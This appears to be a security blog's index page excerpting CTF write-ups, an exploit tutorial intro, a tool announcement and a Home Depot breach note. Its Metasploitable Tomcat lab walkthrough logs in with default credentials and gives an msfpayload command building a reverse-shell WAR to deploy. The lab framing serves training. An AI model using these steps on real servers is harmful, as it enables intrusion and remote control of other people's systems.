CSAW 2014 walkthrough – Fluffy No More

Fluffy No More was a Forensics 300-point challenge at CSAW 2014. The backstory seemed kind of funny and I thought I’d give it a shot!

fluffy no more challenge

Setup

The attached tarball contained a few additional tarballs:

  • Full /etc directory contents
  • Full /var/log directory contents
  • Full /var/www directory contents
  • A MySQL database dump file

The task was to determine the attacker’s ingress point as well as discover a key for the CTF challenge. I cover both points in the sections below.

CSAW 2014 walkthrough – pybabbies

pybabbies was an Exploitation 200 challenge during the CTF and I got “voluntold” to work on this one by my teammates since I have a strong Python background. The night was young and I felt pretty good about it, so I took a look.

pybabbies challenge

Setting the scene

Connecting to that IP/port with netcat revealed a shell prompt indicating that I had connected to a Python sandbox environment. Python sandboxes are nothing new, and I had actually recently done some reading on a sandbox challenge from an older CTF writeup, so I felt pretty good about what I was getting myself into.

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Let’s start with an Nmap scan…

The scan shows Tomcat listening on port 8180 (Metasploitable moves it off the default 8080). Let’s take a look at it…

As we can see, the Tomcat manager requires a login. Metasploitable’s Tomcat ships with the well-known default credentials tomcat / tomcat, so let’s try those.

We have logged into the manager application! Now let’s generate a reverse shell packaged as a WAR that the manager can deploy.

msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.28.245 LPORT=4444 W > myshell.war

A reverse payload connects back to the attacker, so it takes LHOST and LPORT (our listening address and port) rather than an RHOST. The W output format wraps the payload in a WAR file, which is what the manager’s deploy function expects. Start a listener on 4444 before deploying the WAR, then browse to the deployed context to trigger it.

Enumerator PIP install is live

Great news! After collaborating with felux (@sugarstackio) of http://sugarstack.io in #overflowsec, I’m excited to say that enumerator can now be installed with pip! Woohoo!

More information can be obtained at Enumerator PIP. Give it a once-over; it’s an easy install now.

Thanks felux for all of the hard work, the project is coming along great. Look for more updates in the future.

Simple Buffer Overflow bypassing SEH

Recently I have gotten more interested in exploit writing and the entire process behind it. Being a noob to this, I obviously started my quest by looking for tutorials. Unfortunately I wasn’t able to find the “Explain like I’m 5” tutorial that I needed, and the entire process took me much longer than anticipated. Now that I finally have it figured out, I wanted to share it with the world! 😀

Home Depot Data Breach

Details are still not clear, but at this point we do suspect there has been a large data breach at The Home Depot. There is no reason to believe only some stores were affected, and chances are the breach is spread across the company’s 2,000+ stores.

Banks are saying they have seen “suspicious” activity so far dating back to April of 2014. If that is the case, we need to think about the impact this could have. If you remember back, Target had only been breached for 2-3 weeks and leaked some 40 million credit and debit cards.

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members’ employers.